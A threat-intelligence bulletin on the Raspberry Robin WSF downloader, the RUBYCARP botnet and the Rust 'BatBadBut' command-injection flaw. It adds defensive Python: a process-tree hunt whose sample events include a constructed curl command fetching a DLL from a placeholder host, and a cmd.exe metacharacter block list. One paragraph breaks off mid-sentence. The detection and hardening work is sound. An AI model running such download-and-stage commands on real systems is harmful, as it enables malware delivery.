Ankura CTIX FLASH Update – April 12, 2024 – Security

Ransomware/Malware Activity

Raspberry Robin Worm Now Spreads Through Windows Script Files (WSF)

Raspberry Robin is a Windows worm first observed in 2021 and is
known for establishing a malicious foothold on victim devices in
order to deliver some of the most prevalent forms of malware,
including SocGholish, Cobalt Strike, and IcedID. Raspberry Robin
has been known to initially infect victim computers through
compromised USB devices, RAR files hosted on Discord, and ZIP files
contained in malicious advertisements and downloaded via the web
browser. Researchers have now identified a new infection method via
Windows Script Files (.wsf) that are hosted on malicious domains
and subdomains controlled by threat actors. The WSF file acts as a
downloader and retrieves the main DLL payload from a compromised
remote server using the curl command. Raspberry Robin is noted for
the sophisticated obfuscation and anti-analysis techniques it
deploys to evade detection and hinder discovery. The Raspberry
Robin script runs a series of checks on the victim environment and
aborts execution should any check fail. The checks include whether
the script is running in a virtualized environment, the Windows
operating system in use, and whether certain anti-virus programs
are running. Importantly, the Raspberry Robin scripts are not
currently classified as malicious by the anti-virus scanners on
VirusTotal, which reflects the evasiveness of the malware.
Identifying this malware early in the infection chain should be a
high priority for security teams, as it is a precursor to more
damaging malware such as infostealers and ransomware. CTIX
analysts recommend blocking the indicators of compromise (IOCs)
associated with this campaign. CTIX analysts will continue to
report on new and evolving malware campaigns.
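The infection chain above (a script host running a .wsf that spawns curl to fetch a DLL) is a good process-tree hunt. The following is an added example, not code from the bulletin: it runs that logic over constructed, simplified Sysmon Event ID 1-style records (pid, ppid, image, cmdline) and returns one finding per curl.exe whose parent is wscript.exe or cscript.exe executing a .wsf, with extra weight when the download target is a DLL or the script sits in a user-writable path.

```python
"""Hunt for the Raspberry Robin WSF chain: wscript/cscript running a .wsf
that spawns curl.exe. Added example over constructed events, not the
bulletin's own tooling."""

# Constructed Sysmon Event ID 1-style records (simplified); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.wsf"'},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\upd.dll http://example.invalid/dl"},
    {"pid": 5001, "ppid": 900, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //nologo "C:\Scripts\logon.wsf"'},   # benign: no curl child
    {"pid": 5100, "ppid": 1200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://example.invalid/health"},       # benign: parent not a script host
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")


def image_name(path):
    """Case-insensitive basename of an image path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_wsf_curl_chains(events):
    """Return one finding per curl.exe whose parent is a script host running a .wsf."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for child in events:
        if image_name(child["image"]) != "curl.exe":
            continue
        parent = by_pid.get(child["ppid"])
        if parent is None or image_name(parent["image"]) not in SCRIPT_HOSTS:
            continue
        parent_cmd = parent["cmdline"].lower()
        if ".wsf" not in parent_cmd:
            continue
        reasons = ["script host running .wsf spawned curl.exe"]
        if ".dll" in child["cmdline"].lower():
            reasons.append("curl output is a DLL")           # matches the WSF downloader stage
        if any(d in parent_cmd for d in USER_WRITABLE):
            reasons.append(".wsf launched from a user-writable path")
        findings.append({"parent_pid": parent["pid"], "curl_pid": child["pid"],
                         "severity": "high" if len(reasons) >= 2 else "medium",
                         "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_wsf_curl_chains(SAMPLE_EVENTS):
        print(finding)
```

Pair this with blocking the campaign IOCs; the parent/child rule catches the behaviour even when the .wsf itself is not yet flagged by scanners.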

Threat Actor Activity

Stealthy RUBYCARP Botnet Group Discovered After a Decade of Operation

A suspected Romanian botnet group known as RUBYCARP has been
discovered after more than ten (10) years of operating their
botnet. They are known to be financially motivated, with
similarities among their tactics that possibly link them to the
Outlaw APT threat group. RUBYCARP specializes in exploiting known
vulnerabilities and using brute force attacks to compromise
corporate networks and servers. The cybercriminals’ arsenal has
been diverse, exploiting vulnerabilities in Laravel applications
(CVE-2021-3129), brute-forcing SSH servers, and targeting WordPress
sites via credential dumps. The botnet, comprised of over 600
compromised servers, primarily utilizes Perl-based payloads with a
significant focus on crypto mining, phishing campaigns, and
distributed denial of service (DDoS) attacks. The attackers
frequently rotate their infrastructure and have been observed
kicking out clients whose connections are not properly configured
and blocking their IPs to deter security analysts attempting to
investigate the group’s infrastructure. Of the thirty-nine (39)
discovered variants, only eight (8) appeared on VirusTotal,
highlighting the group’s sophisticated evasion tactics. Along with
launching DDoS attacks from infected devices, RUBYCARP uses an
array of crypto miners to mine cryptocurrencies like Monero,
Ethereum, and Ravencoin at the expense of the victim’s
computational resources. Additionally, phishing tactics are used to
steal financial information such as credit card data, either by
deploying phishing pages directly on compromised servers or
sending phishing emails from them. The phishing campaigns have
largely been aimed at European targets, including Swiss Bank, Nets
Bank, and Bring Logistics. While RUBYCARP isn’t the largest
player in the arena of botnets, their stealthiness and operational
security are impressive. The group’s activities highlight the
persistent threat posed by organized cybercrime groups and the
importance of robust cybersecurity measures to protect against such

Critical “BatBadBut” Vulnerability in the Rust Standard Library Allows for Windows Command Injection

A critical security vulnerability in the Rust standard library,
dubbed “BatBadBut”, has been discovered, primarily
affecting Windows systems through command injection attacks. This
flaw, tracked as CVE-2024-24576 and assigned a CVSS score of 10/10
by GitHub, allows unauthenticated attackers to remotely execute
malicious commands on a system without any user interaction, due
to weaknesses in how OS commands and arguments are handled.
Specifically, the vulnerability occurs when batch files with
“.bat” or “.cmd” extensions are invoked through the
Command API without proper argument escaping. The issue is
confined to Rust versions prior to 1.77.2 on Windows; no other
platforms are impacted. The Rust Security Response Working Group
has addressed the issue by modifying the Command API to improve
argument escaping and handle errors more robustly. This
vulnerability also affects several other programming languages,
including Java, Go, and Python, though not all have issued
patches. Security recommendations include moving batch files out
of accessible directories to prevent unauthorized execution. CTIX
analysts urge all developers to identify which of the programming
languages they use are affected and apply the latest patch or
follow the guidance documentation provided by the maintainers.
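Because the patched runtimes escape batch-file arguments on the program's behalf while other languages may not, a defence-in-depth layer that refuses cmd.exe metacharacters before a .bat/.cmd script is ever spawned is worth having regardless of toolchain version. The following is an added example in Python (not the Rust or CPython fix): it enforces an allowlist on each argument, restricts the script to an assumed approved directory (the bulletin's "move batch files out of accessible directories" advice), and rejects path traversal; the directory name and script are placeholders.

```python
"""Defence in depth for CVE-2024-24576 (BatBadBut): validate untrusted input
before it reaches a .bat/.cmd script via subprocess on Windows. Added example;
the allowlist is an assumption, not the runtime's own escaping rules."""
import re
import subprocess
from pathlib import PureWindowsPath

# Characters cmd.exe interprets when it parses a batch-file command line.
CMD_METACHARS = set('&|<>^%"\r\n')
# Conservative allowlist: file-name-like tokens only, bounded in length.
SAFE_ARG = re.compile(r"[A-Za-z0-9._-]{1,255}")


def is_batch_script(path):
    """True for the extensions that cmd.exe will be used to run."""
    return PureWindowsPath(path).suffix.lower() in {".bat", ".cmd"}


def validate_bat_args(args):
    """Map each rejected argument to a reason; an empty dict means all are safe."""
    rejected = {}
    for arg in args:
        meta = sorted(CMD_METACHARS & set(arg))
        if meta:
            rejected[arg] = "cmd.exe metacharacter(s): " + repr("".join(meta))
        elif not SAFE_ARG.fullmatch(arg):
            rejected[arg] = "outside allowlist [A-Za-z0-9._-]"
    return rejected


def run_batch(script, args, allowed_dir):
    """Spawn a batch script only if it lives under allowed_dir and all args pass."""
    script_path = PureWindowsPath(script)
    if not is_batch_script(script_path):
        raise ValueError("not a batch script")
    # PureWindowsPath does not normalise '..', so reject it explicitly; real code
    # on Windows should also Path.resolve() the script before this check.
    if ".." in script_path.parts:
        raise ValueError("path traversal in script path")
    if PureWindowsPath(allowed_dir) not in script_path.parents:
        raise ValueError("script outside allowed directory")
    bad = validate_bat_args(args)
    if bad:
        raise ValueError(f"rejected arguments: {bad}")
    # Never route through shell=True; pass the list form so no extra parsing occurs.
    return subprocess.run([str(script_path), *args], check=True)
```

The allowlist is deliberately narrower than what correct escaping would permit; widen it only for fields whose format is known, never to admit the metacharacter set.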
